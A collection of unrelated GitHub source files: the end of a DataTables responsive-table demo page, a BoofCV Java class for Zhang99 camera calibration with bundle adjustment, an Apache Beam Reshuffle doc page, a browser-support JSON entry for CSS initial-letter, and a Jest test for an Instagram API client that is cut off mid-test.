<td>Paul</td> <td>Byrd</td> <td>Chief Financial Officer (CFO)</td> <td>New York</td> <td>64</td> <td>2010/06/09</td> <td>$725,000</td> <td>3059</td> <td>[email protected]</td> </tr> <tr> <td>Gloria</td> <td>Little</td> <td>Systems Administrator</td> <td>New York</td> <td>59</td> <td>2009/04/10</td> <td>$237,500</td> <td>1721</td> <td>[email protected]</td> </tr> <tr> <td>Bradley</td> <td>Greer</td> <td>Software Engineer</td> <td>London</td> <td>41</td> <td>2012/10/13</td> <td>$132,000</td> <td>2558</td> <td>[email protected]</td> </tr> <tr> <td>Dai</td> <td>Rios</td> <td>Personnel Lead</td> <td>Edinburgh</td> <td>35</td> <td>2012/09/26</td> <td>$217,500</td> <td>2290</td> <td>[email protected]</td> </tr> <tr> <td>Jenette</td> <td>Caldwell</td> 
<td>Development Lead</td> <td>New York</td> <td>30</td> <td>2011/09/03</td> <td>$345,000</td> <td>1937</td> <td>[email protected]</td> </tr> <tr> <td>Yuri</td> <td>Berry</td> <td>Chief Marketing Officer (CMO)</td> <td>New York</td> <td>40</td> <td>2009/06/25</td> <td>$675,000</td> <td>6154</td> <td>[email protected]</td> </tr> <tr> <td>Caesar</td> <td>Vance</td> <td>Pre-Sales Support</td> <td>New York</td> <td>21</td> <td>2011/12/12</td> <td>$106,450</td> <td>8330</td> <td>[email protected]</td> </tr> <tr> <td>Doris</td> <td>Wilder</td> <td>Sales Assistant</td> <td>Sidney</td> <td>23</td> <td>2010/09/20</td> <td>$85,600</td> <td>3023</td> <td>[email protected]</td> </tr> <tr> <td>Angelica</td> <td>Ramos</td> <td>Chief Executive Officer (CEO)</td> <td>London</td> <td>47</td> <td>2009/10/09</td> <td>$1,200,000</td> <td>5797</td> <td>[email protected]</td> </tr> <tr> <td>Gavin</td> <td>Joyce</td> <td>Developer</td> <td>Edinburgh</td> <td>42</td> <td>2010/12/22</td> <td>$92,575</td> <td>8822</td> <td>[email protected]</td> </tr> <tr> <td>Jennifer</td> <td>Chang</td> <td>Regional Director</td> <td>Singapore</td> <td>28</td> <td>2010/11/14</td> <td>$357,650</td> <td>9239</td> <td>[email protected]</td> </tr> <tr> <td>Brenden</td> <td>Wagner</td> <td>Software Engineer</td> <td>San Francisco</td> <td>28</td> <td>2011/06/07</td> <td>$206,850</td> <td>1314</td> <td>[email protected]</td> </tr> <tr> <td>Fiona</td> <td>Green</td> <td>Chief Operating Officer (COO)</td> <td>San Francisco</td> <td>48</td> <td>2010/03/11</td> <td>$850,000</td> <td>2947</td> <td>[email protected]</td> </tr> <tr> <td>Shou</td> <td>Itou</td> <td>Regional Marketing</td> <td>Tokyo</td> <td>20</td> <td>2011/08/14</td> <td>$163,000</td> <td>8899</td> <td>[email protected]</td> </tr> <tr> <td>Michelle</td> <td>House</td> <td>Integration Specialist</td> <td>Sidney</td> <td>37</td> <td>2011/06/02</td> <td>$95,400</td> <td>2769</td> <td>[email protected]</td> </tr> <tr> <td>Suki</td> <td>Burks</td> 
<td>Developer</td> <td>London</td> <td>53</td> <td>2009/10/22</td> <td>$114,500</td> <td>6832</td> <td>[email protected]</td> </tr> <tr> <td>Prescott</td> <td>Bartlett</td> <td>Technical Author</td> <td>London</td> <td>27</td> <td>2011/05/07</td> <td>$145,000</td> <td>3606</td> <td>[email protected]</td> </tr> <tr> <td>Gavin</td> <td>Cortez</td> <td>Team Leader</td> <td>San Francisco</td> <td>22</td> <td>2008/10/26</td> <td>$235,500</td> <td>2860</td> <td>[email protected]</td> </tr> <tr> <td>Martena</td> <td>Mccray</td> <td>Post-Sales support</td> <td>Edinburgh</td> <td>46</td> <td>2011/03/09</td> <td>$324,050</td> <td>8240</td> <td>[email protected]</td> </tr> <tr> <td>Unity</td> <td>Butler</td> <td>Marketing Designer</td> <td>San Francisco</td> <td>47</td> <td>2009/12/09</td> <td>$85,675</td> <td>5384</td> <td>[email protected]</td> </tr> <tr> <td>Howard</td> <td>Hatfield</td> <td>Office Manager</td> <td>San Francisco</td> <td>51</td> <td>2008/12/16</td> <td>$164,500</td> <td>7031</td> <td>[email protected]</td> </tr> <tr> <td>Hope</td> <td>Fuentes</td> <td>Secretary</td> <td>San Francisco</td> <td>41</td> <td>2010/02/12</td> <td>$109,850</td> <td>6318</td> <td>[email protected]</td> </tr> <tr> <td>Vivian</td> <td>Harrell</td> <td>Financial Controller</td> <td>San Francisco</td> <td>62</td> <td>2009/02/14</td> <td>$452,500</td> <td>9422</td> <td>[email protected]</td> </tr> <tr> <td>Timothy</td> <td>Mooney</td> <td>Office Manager</td> <td>London</td> <td>37</td> <td>2008/12/11</td> <td>$136,200</td> <td>7580</td> <td>[email protected]</td> </tr> <tr> <td>Jackson</td> <td>Bradshaw</td> <td>Director</td> <td>New York</td> <td>65</td> <td>2008/09/26</td> <td>$645,750</td> <td>1042</td> <td>[email protected]</td> </tr> <tr> <td>Olivia</td> <td>Liang</td> <td>Support Engineer</td> <td>Singapore</td> <td>64</td> <td>2011/02/03</td> <td>$234,500</td> <td>2120</td> <td>[email protected]</td> </tr> <tr> <td>Bruno</td> <td>Nash</td> <td>Software Engineer</td> 
<td>London</td> <td>38</td> <td>2011/05/03</td> <td>$163,500</td> <td>6222</td> <td>[email protected]</td> </tr> <tr> <td>Sakura</td> <td>Yamamoto</td> <td>Support Engineer</td> <td>Tokyo</td> <td>37</td> <td>2009/08/19</td> <td>$139,575</td> <td>9383</td> <td>[email protected]</td> </tr> <tr> <td>Thor</td> <td>Walton</td> <td>Developer</td> <td>New York</td> <td>61</td> <td>2013/08/11</td> <td>$98,540</td> <td>8327</td> <td>[email protected]</td> </tr> <tr> <td>Finn</td> <td>Camacho</td> <td>Support Engineer</td> <td>San Francisco</td> <td>47</td> <td>2009/07/07</td> <td>$87,500</td> <td>2927</td> <td>[email protected]</td> </tr> <tr> <td>Serge</td> <td>Baldwin</td> <td>Data Coordinator</td> <td>Singapore</td> <td>64</td> <td>2012/04/09</td> <td>$138,575</td> <td>8352</td> <td>[email protected]</td> </tr> <tr> <td>Zenaida</td> <td>Frank</td> <td>Software Engineer</td> <td>New York</td> <td>63</td> <td>2010/01/04</td> <td>$125,250</td> <td>7439</td> <td>[email protected]</td> </tr> <tr> <td>Zorita</td> <td>Serrano</td> <td>Software Engineer</td> <td>San Francisco</td> <td>56</td> <td>2012/06/01</td> <td>$115,000</td> <td>4389</td> <td>[email protected]</td> </tr> <tr> <td>Jennifer</td> <td>Acosta</td> <td>Junior Javascript Developer</td> <td>Edinburgh</td> <td>43</td> <td>2013/02/01</td> <td>$75,650</td> <td>3431</td> <td>[email protected]</td> </tr> <tr> <td>Cara</td> <td>Stevens</td> <td>Sales Assistant</td> <td>New York</td> <td>46</td> <td>2011/12/06</td> <td>$145,600</td> <td>3990</td> <td>[email protected]</td> </tr> <tr> <td>Hermione</td> <td>Butler</td> <td>Regional Director</td> <td>London</td> <td>47</td> <td>2011/03/21</td> <td>$356,250</td> <td>1016</td> <td>[email protected]</td> </tr> <tr> <td>Lael</td> <td>Greer</td> <td>Systems Administrator</td> <td>London</td> <td>21</td> <td>2009/02/27</td> <td>$103,500</td> <td>6733</td> <td>[email protected]</td> </tr> <tr> <td>Jonas</td> <td>Alexander</td> <td>Developer</td> <td>San Francisco</td> <td>30</td> 
<td>2010/07/14</td> <td>$86,500</td> <td>8196</td> <td>[email protected]</td> </tr> <tr> <td>Shad</td> <td>Decker</td> <td>Regional Director</td> <td>Edinburgh</td> <td>51</td> <td>2008/11/13</td> <td>$183,000</td> <td>6373</td> <td>[email protected]</td> </tr> <tr> <td>Michael</td> <td>Bruce</td> <td>Javascript Developer</td> <td>Singapore</td> <td>29</td> <td>2011/06/27</td> <td>$183,000</td> <td>5384</td> <td>[email protected]</td> </tr> <tr> <td>Donna</td> <td>Snider</td> <td>Customer Support</td> <td>New York</td> <td>27</td> <td>2011/01/25</td> <td>$112,000</td> <td>4226</td> <td>[email protected]</td> </tr> </tbody> </table> <ul class="tabs"> <li class="active">Javascript</li> <li>HTML</li> <li>CSS</li> <li>Ajax</li> <li>Server-side script</li> </ul> <div class="tabs"> <div class="js"> <p>The Javascript shown below is used to initialise the table shown in this example:</p><code class="multiline language-js">$(document).ready(function() { $('#example').DataTable( { responsive: { details: false } } ); } );</code> <p>In addition to the above code, the following Javascript library files are loaded for use in this example:</p> <ul> <li><a href="../../../../media/js/jquery.js">../../../../media/js/jquery.js</a></li> <li><a href="../../../../media/js/jquery.dataTables.js">../../../../media/js/jquery.dataTables.js</a></li> <li><a href="../../js/dataTables.responsive.js">../../js/dataTables.responsive.js</a></li> </ul> </div> <div class="table"> <p>The HTML shown below is the raw HTML table element, before it has been enhanced by DataTables:</p> </div> <div class="css"> <div> <p>This example uses a little bit of additional CSS beyond what is loaded from the library files (below), in order to correctly display the table. 
The additional CSS used is shown below:</p><code class="multiline language-css"></code> </div> <p>The following CSS library files are loaded for use in this example to provide the styling of the table:</p> <ul> <li><a href="../../../../media/css/jquery.dataTables.css">../../../../media/css/jquery.dataTables.css</a></li> <li><a href="../../css/dataTables.responsive.css">../../css/dataTables.responsive.css</a></li> </ul> </div> <div class="ajax"> <p>This table loads data by Ajax. The latest data that has been loaded is shown below. This data will update automatically as any additional data is loaded.</p> </div> <div class="php"> <p>The script used to perform the server-side processing for this table is shown below. Please note that this is just an example script using PHP. Server-side processing scripts can be written in any language, using <a href="//datatables.net/manual/server-side">the protocol described in the DataTables documentation</a>.</p> </div> </div> </section> </div> <section> <div class="footer"> <div class="gradient"></div> <div class="liner"> <h2>Other examples</h2> <div class="toc"> <div class="toc-group"> <h3><a href="../initialisation/index.html">Basic initialisation</a></h3> <ul class="toc"> <li><a href="../initialisation/className.html">Class name</a></li> <li><a href="../initialisation/option.html">Configuration option</a></li> <li><a href="../initialisation/new.html">`new` constructor</a></li> <li><a href="../initialisation/ajax.html">Ajax data</a></li> <li><a href="../initialisation/default.html">Default initialisation</a></li> </ul> </div> <div class="toc-group"> <h3><a href="../styling/index.html">Styling</a></h3> <ul class="toc"> <li><a href="../styling/bootstrap.html">Bootstrap styling</a></li> <li><a href="../styling/foundation.html">Foundation styling</a></li> <li><a href="../styling/scrolling.html">Vertical scrolling</a></li> <li><a href="../styling/compact.html">Compact styling</a></li> </ul> </div> <div class="toc-group"> <h3><a 
href="../display-control/index.html">Display control</a></h3> <ul class="toc"> <li><a href="../display-control/auto.html">Automatic column hiding</a></li> <li><a href="../display-control/classes.html">Class control</a></li> <li><a href="../display-control/init-classes.html">Assigned class control</a></li> <li><a href="../display-control/fixedHeader.html">With FixedHeader</a></li> <li><a href="../display-control/complexHeader.html">Complex headers (rowspan / colspan)</a></li> </ul> </div> <div class="toc-group"> <h3><a href="./index.html">Child rows</a></h3> <ul class="toc active"> <li class="active"><a href="./disable-child-rows.html">Disable child rows</a></li> <li><a href="./column-control.html">Column controlled child rows</a></li> <li><a href="./right-column.html">Column control - right</a></li> <li><a href="./whole-row-control.html">Whole row child row control</a></li> <li><a href="./custom-renderer.html">Custom child row renderer</a></li> </ul> </div> </div> <div class="epilogue"> <p>Please refer to the <a href="http://www.datatables.net">DataTables documentation</a> for full information about its API properties and methods.<br> Additionally, there are a wide range of <a href="http://www.datatables.net/extras">extras</a> and <a href="http://www.datatables.net/plug-ins">plug-ins</a> which extend the capabilities of DataTables.</p> <p class="copyright">DataTables designed and created by <a href="http://www.sprymedia.co.uk">SpryMedia Ltd</a> &#169; 2007-2015<br> DataTables is licensed under the <a href="http://www.datatables.net/mit">MIT license</a>.</p> </div> </div> </div> </section> </body> </html>
{ "pile_set_name": "Github" }
/*
 * Copyright (c) 2011-2020, Peter Abeles. All Rights Reserved.
 *
 * This file is part of BoofCV (http://boofcv.org).
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package boofcv.alg.geo.calibration;

import boofcv.abst.geo.bundle.BundleAdjustment;
import boofcv.abst.geo.bundle.SceneObservations;
import boofcv.abst.geo.bundle.SceneStructureMetric;
import boofcv.abst.geo.calibration.ImageResults;
import boofcv.alg.geo.bundle.BundleAdjustmentMetricResidualFunction;
import boofcv.alg.geo.bundle.CodecSceneStructureMetric;
import boofcv.alg.geo.calibration.cameras.Zhang99Camera;
import boofcv.factory.geo.ConfigBundleAdjustment;
import boofcv.factory.geo.FactoryMultiView;
import boofcv.struct.calib.CameraModel;
import boofcv.struct.geo.PointIndex2D_F64;
import georegression.struct.point.Point2D_F64;
import georegression.struct.se.Se3_F64;
import org.ddogleg.optimization.lm.ConfigLevenbergMarquardt;
import org.ddogleg.struct.VerbosePrint;
import org.ejml.data.DMatrixRMaj;
import org.jetbrains.annotations.Nullable;

import java.io.PrintStream;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

/**
 * <p>
 * Full implementation of the Zhang99 camera calibration algorithm using planar calibration targets. First
 * linear approximations of camera parameters are computed, which are then refined using non-linear estimation.
 * One difference from the original paper is that tangential distortion can be included. No linear estimate
 * is found for tangential distortion; it is estimated by initializing the non-linear estimate with all zeros.
 * </p>
 *
 * <p>
 * When processing the results be sure to take in account the coordinate system being left or right handed. Calibration
 * works just fine with either coordinate system, but most 3D geometric algorithms assume a right handed coordinate
 * system while most images are left handed.
 * </p>
 *
 * <p>
 * A listener can be provided that will give status updates and allows requests for early termination. If a request
 * for early termination is made then a RuntimeException will be thrown.
 * </p>
 *
 * <p>
 * [1] Zhengyou Zhang, "Flexible Camera Calibration By Viewing a Plane From Unknown Orientations,",
 * International Conference on Computer Vision (ICCV'99), Corfu, Greece, pages 666-673, September 1999.
 * </p>
 *
 * @author Peter Abeles
 */
public class CalibrationPlanarGridZhang99 implements VerbosePrint {
	// Abstraction over the camera model being calibrated (supplies K initialization and model conversion)
	Zhang99Camera cameraGenerator;

	// estimation algorithms used for the linear initialization stage
	private final Zhang99ComputeTargetHomography computeHomography;
	private final Zhang99CalibrationMatrixFromHomographies computeK;
	private final RadialDistortionEstimateLinear computeRadial;
	private final Zhang99DecomposeHomography decomposeH = new Zhang99DecomposeHomography();

	// contains found parameters (populated by convertIntoBundleStructure, refined by bundle adjustment)
	public SceneStructureMetric structure;
	public SceneObservations observations;

	// provides information on calibration status and can request early termination
	private Listener listener;

	// where calibration points are laid out on the target (z=0 plane).
	private final List<Point2D_F64> layout;

	// Use a robust non-linear solver. This can run significantly slower
	private boolean robust = false;

	// destination for solver verbose output; null disables it
	private PrintStream verbose = null;

	/**
	 * Configures calibration process.
	 *
	 * @param layout Layout of calibration points on the target
	 * @param cameraGenerator Provides camera-model-specific initialization and settings
	 */
	public CalibrationPlanarGridZhang99( List<Point2D_F64> layout, Zhang99Camera cameraGenerator ) {
		this.cameraGenerator = cameraGenerator;
		this.layout = layout;
		computeHomography = new Zhang99ComputeTargetHomography(layout);
		computeK = new Zhang99CalibrationMatrixFromHomographies(cameraGenerator.isZeroSkew());
		computeRadial = new RadialDistortionEstimateLinear(layout, cameraGenerator.numRadial());
	}

	/**
	 * Used to listen in on progress and request that processing be stopped
	 *
	 * @param listener The listener
	 */
	public void setListener( Listener listener ) {
		this.listener = listener;
	}

	/**
	 * Processes observed calibration point coordinates and computes camera intrinsic and extrinsic
	 * parameters.
	 *
	 * @param observations Set of observed grid locations in pixel coordinates.
	 * @return true if successful and false if it failed
	 */
	public boolean process( List<CalibrationObservation> observations ) {
		// compute initial parameter estimates using linear algebra
		if (!linearEstimate(observations))
			return false;

		status("Non-linear refinement");
		// perform non-linear optimization to improve results
		if (!performBundleAdjustment())
			return false;

		return true;
	}

	/**
	 * Find an initial estimate for calibration parameters using linear techniques:
	 * per-view homographies, then the calibration matrix K, then each view's pose from
	 * the decomposed homography, then a linear estimate of radial distortion.
	 *
	 * @param observations observed grid locations, one element per view
	 * @return false if a homography could not be computed for some view, true otherwise
	 */
	protected boolean linearEstimate( List<CalibrationObservation> observations ) {
		status("Estimating Homographies");
		List<DMatrixRMaj> homographies = new ArrayList<>();
		List<Se3_F64> motions = new ArrayList<>();
		for (CalibrationObservation obs : observations) {
			if (!computeHomography.computeHomography(obs))
				return false;

			DMatrixRMaj H = computeHomography.getHomography();

			homographies.add(H);
		}

		status("Estimating Calibration Matrix");
		computeK.process(homographies);

		DMatrixRMaj K = computeK.getCalibrationMatrix();

		decomposeH.setCalibrationMatrix(K);
		for (DMatrixRMaj H : homographies) {
			motions.add(decomposeH.decompose(H));
		}

		status("Estimating Radial Distortion");
		computeRadial.process(K, homographies, observations);

		double[] distort = computeRadial.getParameters();

		convertIntoBundleStructure(motions, K, distort, observations);
		return true;
	}

	/**
	 * Notifies the listener, if any, of the current task. Throws a RuntimeException if the
	 * listener requests that calibration be terminated early.
	 */
	private void status( String message ) {
		if (listener != null) {
			if (!listener.zhangUpdate(message))
				throw new RuntimeException("User requested termination of calibration");
		}
	}

	/**
	 * Use non-linear optimization to improve the parameter estimates.
	 * Requires {@link #structure} and {@link #observations} to have been populated first
	 * (see {@link #convertIntoBundleStructure}).
	 */
	public boolean performBundleAdjustment() {
		// Configure the sparse Levenberg-Marquardt solver
		ConfigLevenbergMarquardt configLM = new ConfigLevenbergMarquardt();
		configLM.hessianScaling = false;

		ConfigBundleAdjustment configSBA = new ConfigBundleAdjustment();
		configSBA.configOptimizer = configLM;

		BundleAdjustment<SceneStructureMetric> bundleAdjustment;
		if (robust) {
			// NOTE(review): robust mode forces mixture=0 and a dense solver — presumably
			// trading speed for robustness; confirm against FactoryMultiView docs
			configLM.mixture = 0;
			bundleAdjustment = FactoryMultiView.bundleDenseMetric(true, configSBA);
		} else {
			bundleAdjustment = FactoryMultiView.bundleSparseMetric(configSBA);
		}

		bundleAdjustment.setVerbose(verbose, null);

		// Specifies convergence criteria (tolerances and maximum iteration count)
		bundleAdjustment.configure(1e-20, 1e-20, 200);

		bundleAdjustment.setParameters(structure, observations);
		return bundleAdjustment.optimize(structure);
	}

	/**
	 * Convert it into a data structure understood by {@link BundleAdjustment}
	 */
	public void convertIntoBundleStructure( List<Se3_F64> motions,
											DMatrixRMaj K,
											double[] distort,
											List<CalibrationObservation> obs ) {
		structure = new SceneStructureMetric(false);
		structure.initialize(1, motions.size(), -1, layout.size(), 1);

		observations = new SceneObservations();
		observations.initialize(motions.size(), true);

		// A single camera is assumed, that's what is being calibrated!
		structure.setCamera(0, false, cameraGenerator.initalizeCamera(K, distort));
		// A single rigid planar target is being viewed. It is assumed to be centered at the origin
		structure.setRigid(0, true, new Se3_F64(), layout.size());

		// Where the points are on the calibration target (z=0 since the target is planar)
		SceneStructureMetric.Rigid rigid = structure.rigids.data[0];
		for (int i = 0; i < layout.size(); i++) {
			rigid.setPoint(i, layout.get(i).x, layout.get(i).y, 0);
		}

		// Add the initial estimate of each view's location and the points observed
		for (int viewIdx = 0; viewIdx < motions.size(); viewIdx++) {
			structure.setView(viewIdx, 0, false, motions.get(viewIdx));
			SceneObservations.View v = observations.getViewRigid(viewIdx);
			CalibrationObservation ca = obs.get(viewIdx);
			for (int j = 0; j < ca.size(); j++) {
				PointIndex2D_F64 p = ca.get(j);
				v.add(p.index, (float)p.x, (float)p.y);
				structure.connectPointToView(p.index, viewIdx);
			}
		}
	}

	/**
	 * Computes per-view residual statistics (per-point error magnitude, mean/max error,
	 * and mean residual bias in x and y) by re-evaluating the metric residual function
	 * at the current {@link #structure} parameters.
	 */
	public List<ImageResults> computeErrors() {
		List<ImageResults> errors = new ArrayList<>();

		double[] parameters = new double[structure.getParameterCount()];
		double[] residuals = new double[observations.getObservationCount()*2];
		CodecSceneStructureMetric codec = new CodecSceneStructureMetric();
		codec.encode(structure, parameters);

		BundleAdjustmentMetricResidualFunction function = new BundleAdjustmentMetricResidualFunction();
		function.configure(structure, observations);
		function.process(parameters, residuals);

		// residuals are packed as (x,y) pairs in view order, matching observation order
		int idx = 0;
		for (int i = 0; i < observations.viewsRigid.size; i++) {
			SceneObservations.View v = observations.viewsRigid.data[i];
			ImageResults r = new ImageResults(v.size());

			double sumX = 0;
			double sumY = 0;
			double meanErrorMag = 0;
			double maxError = 0;

			for (int j = 0; j < v.size(); j++) {
				double x = residuals[idx++];
				double y = residuals[idx++];
				double nerr = r.pointError[j] = Math.sqrt(x*x + y*y);

				meanErrorMag += nerr;
				maxError = Math.max(maxError, nerr);

				sumX += x;
				sumY += y;
			}

			r.biasX = sumX/v.size();
			r.biasY = sumY/v.size();
			r.meanError = meanErrorMag/v.size();
			r.maxError = maxError;

			errors.add(r);
		}

		return errors;
	}

	/**
	 * Returns the calibrated camera model converted from the bundle-adjustment representation.
	 */
	public CameraModel getCameraModel() {
		return cameraGenerator.getCameraModel(structure.cameras.get(0).model);
	}

	/**
	 * Applies radial and tangential distortion to the normalized image coordinate.
	 *
	 * @param normPt point in normalized image coordinates; modified in place
	 * @param radial radial distortion parameters
	 * @param t1 tangential parameter
	 * @param t2 tangential parameter
	 */
	public static void applyDistortion( Point2D_F64 normPt, double[] radial, double t1, double t2 ) {
		final double x = normPt.x;
		final double y = normPt.y;

		// radial term: a = k1*r^2 + k2*r^4 + ... computed by accumulating powers of r^2
		double a = 0;
		double r2 = x*x + y*y;
		double r2i = r2;
		for (int i = 0; i < radial.length; i++) {
			a += radial[i]*r2i;
			r2i *= r2;
		}

		normPt.x = x + x*a + 2*t1*x*y + t2*(r2 + 2*x*x);
		normPt.y = y + y*a + t1*(r2 + 2*y*y) + 2*t2*x*y;
	}

	public SceneStructureMetric getStructure() {
		return structure;
	}

	public void setRobust( boolean robust ) {
		this.robust = robust;
	}

	/**
	 * Total number of observed calibration points summed across all views.
	 */
	public static int totalPoints( List<CalibrationObservation> observations ) {
		int total = 0;
		for (int i = 0; i < observations.size(); i++) {
			total += observations.get(i).size();
		}
		return total;
	}

	@Override public void setVerbose( @Nullable PrintStream out, @Nullable Set<String> configuration ) {
		this.verbose = out;
	}

	public interface Listener {
		/**
		 * Updated to update the status and request that processing be stopped
		 *
		 * @param taskName Name of the task being performed
		 * @return true to continue and false to request a stop
		 */
		boolean zhangUpdate( String taskName );
	}
}
{ "pile_set_name": "Github" }
--- title: "Reshuffle" --- <!-- Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> # Reshuffle <table align="left"> <a target="_blank" class="button" href="https://beam.apache.org/releases/pydoc/current/apache_beam.transforms.util.html?highlight=reshuffle#apache_beam.transforms.util.Reshuffle"> <img src="https://beam.apache.org/images/logos/sdks/python.png" width="20px" height="20px" alt="Pydoc" /> Pydoc </a> </table> <br><br> Adds a temporary random key to each element in a collection, reshuffles these keys, and removes the temporary key. This redistributes the elements between workers and returns a collection equivalent to its input collection. This is most useful for adjusting parallelism or preventing coupled failures. ## Examples See [BEAM-7391](https://issues.apache.org/jira/browse/BEAM-7391) for updates. ## Related transforms N/A
{ "pile_set_name": "Github" }
{ "title":"CSS Initial Letter", "description":"Method of creating an enlarged cap, including a drop or raised cap, in a robust way.", "spec":"https://www.w3.org/TR/css-inline/#initial-letter-styling", "status":"wd", "links":[ { "url":"https://bugzilla.mozilla.org/show_bug.cgi?id=1223880", "title":"Firefox Implementation Ticket" }, { "url":"https://developer.mozilla.org/en-US/docs/Web/CSS/initial-letter", "title":"MDN Web Docs - CSS initial-letter" }, { "url":"https://webdesign.tutsplus.com/tutorials/better-css-drop-caps-with-initial-letter--cms-26350", "title":"Blog post on Envato Tuts+, \"Better CSS Drop Caps With initial-letter\"" }, { "url":"http://labs.jensimmons.com/#initialletter", "title":"Demos at Jen Simmons Labs" } ], "bugs":[ { "description":"Safari 9 doesn't properly shorten the first line of text. Applying `margin-top: 1em` to the letter fixes this problem." } ], "categories":[ "CSS" ], "stats":{ "ie":{ "5.5":"n", "6":"n", "7":"n", "8":"n", "9":"n", "10":"n", "11":"n" }, "edge":{ "12":"n", "13":"n", "14":"n", "15":"n", "16":"n", "17":"n", "18":"n" }, "firefox":{ "2":"n", "3":"n", "3.5":"n", "3.6":"n", "4":"n", "5":"n", "6":"n", "7":"n", "8":"n", "9":"n", "10":"n", "11":"n", "12":"n", "13":"n", "14":"n", "15":"n", "16":"n", "17":"n", "18":"n", "19":"n", "20":"n", "21":"n", "22":"n", "23":"n", "24":"n", "25":"n", "26":"n", "27":"n", "28":"n", "29":"n", "30":"n", "31":"n", "32":"n", "33":"n", "34":"n", "35":"n", "36":"n", "37":"n", "38":"n", "39":"n", "40":"n", "41":"n", "42":"n", "43":"n", "44":"n", "45":"n", "46":"n", "47":"n", "48":"n", "49":"n", "50":"n", "51":"n", "52":"n", "53":"n", "54":"n", "55":"n", "56":"n", "57":"n", "58":"n", "59":"n", "60":"n", "61":"n", "62":"n", "63":"n" }, "chrome":{ "4":"n", "5":"n", "6":"n", "7":"n", "8":"n", "9":"n", "10":"n", "11":"n", "12":"n", "13":"n", "14":"n", "15":"n", "16":"n", "17":"n", "18":"n", "19":"n", "20":"n", "21":"n", "22":"n", "23":"n", "24":"n", "25":"n", "26":"n", "27":"n", "28":"n", "29":"n", 
"30":"n", "31":"n", "32":"n", "33":"n", "34":"n", "35":"n", "36":"n", "37":"n", "38":"n", "39":"n", "40":"n", "41":"n", "42":"n", "43":"n", "44":"n", "45":"n", "46":"n", "47":"n", "48":"n", "49":"n", "50":"n", "51":"n", "52":"n", "53":"n", "54":"n", "55":"n", "56":"n", "57":"n", "58":"n", "59":"n", "60":"n", "61":"n", "62":"n", "63":"n", "64":"n", "65":"n", "66":"n", "67":"n", "68":"n", "69":"n", "70":"n", "71":"n" }, "safari":{ "3.1":"n", "3.2":"n", "4":"n", "5":"n", "5.1":"n", "6":"n", "6.1":"n", "7":"n", "7.1":"n", "8":"n", "9":"a", "9.1":"a x #1", "10":"a x #1", "10.1":"a x #1", "11":"a x #1", "11.1":"a x #1", "12":"a x #1", "TP":"a x #1" }, "opera":{ "9":"n", "9.5-9.6":"n", "10.0-10.1":"n", "10.5":"n", "10.6":"n", "11":"n", "11.1":"n", "11.5":"n", "11.6":"n", "12":"n", "12.1":"n", "15":"n", "16":"n", "17":"n", "18":"n", "19":"n", "20":"n", "21":"n", "22":"n", "23":"n", "24":"n", "25":"n", "26":"n", "27":"n", "28":"n", "29":"n", "30":"n", "31":"n", "32":"n", "33":"n", "34":"n", "35":"n", "36":"n", "37":"n", "38":"n", "39":"n", "40":"n", "41":"n", "42":"n", "43":"n", "44":"n", "45":"n", "46":"n", "47":"n", "48":"n", "49":"n", "50":"n", "51":"n", "52":"n", "53":"n" }, "ios_saf":{ "3.2":"n", "4.0-4.1":"n", "4.2-4.3":"n", "5.0-5.1":"n", "6.0-6.1":"n", "7.0-7.1":"n", "8":"n", "8.1-8.4":"n", "9.0-9.2":"a x #1", "9.3":"a x #1", "10.0-10.2":"a x #1", "10.3":"a x #1", "11.0-11.2":"a x #1", "11.3-11.4":"a x #1", "12":"a x #1" }, "op_mini":{ "all":"n" }, "android":{ "2.1":"n", "2.2":"n", "2.3":"n", "3":"n", "4":"n", "4.1":"n", "4.2-4.3":"n", "4.4":"n", "4.4.3-4.4.4":"n", "67":"n" }, "bb":{ "7":"n", "10":"n" }, "op_mob":{ "10":"n", "11":"n", "11.1":"n", "11.5":"n", "12":"n", "12.1":"n", "46":"n" }, "and_chr":{ "67":"n" }, "and_ff":{ "60":"n" }, "ie_mob":{ "10":"n", "11":"n" }, "and_uc":{ "11.8":"n" }, "samsung":{ "4":"n", "5":"n", "6.2":"n", "7.2":"n" }, "and_qq":{ "1.2":"n" }, "baidu":{ "7.12":"n" } }, "notes":"", "notes_by_num":{ "1":"Safari implementation is incomplete. 
Does not allow applying web fonts to the initial letter." }, "usage_perc_y":0, "usage_perc_a":11.93, "ucprefix":false, "parent":"", "keywords":"initial-letter,initial letter,letter,drop cap,dropcap", "ie_id":"initialletter", "chrome_id":"", "firefox_id":"css-initial-letter", "webkit_id":"feature-initial-letter", "shown":true }
{ "pile_set_name": "Github" }
// tslint:disable-next-line no-implicit-dependencies import * as nock from 'nock'; import Instagram from '../src/index'; describe('Instagram', () => { it('should be a class', () => { const instagram = new Instagram({} as any); expect(instagram instanceof Instagram).toBeTruthy(); }); it('should set clientId and accessToken', () => { const instagram = new Instagram({ clientId: 'toto', accessToken: 'toto2', } as any); expect((instagram as any).config.clientId).toEqual('toto'); expect((instagram as any).config.accessToken).toEqual('toto2'); }); describe('#request', () => { const instagram = new Instagram({ accessToken: 'toto', } as any); it('sould add access_token in query', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(200, { message: 'success' }); const result = await (instagram as any).request('GET', endpoint); expect(result).toMatchSnapshot(); }); it('sould overwrite access_token in query', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'titi' }) .reply(200, { message: 'success' }); const result = await (instagram as any).request('GET', endpoint, { accessToken: 'titi', }); expect(result).toMatchSnapshot(); }); it('sould return an error', async () => { const endpoint = 'tag/sunset'; nock('https://api.instagram.com') .get(`/v1/${endpoint}`) .query({ access_token: 'toto' }) .reply(400, { message: 'error' }); try { await (instagram as any).request('GET', endpoint); } catch (err) { expect(err).toMatchSnapshot(); } }); it('sould call callback with value', done => { const endpoint = 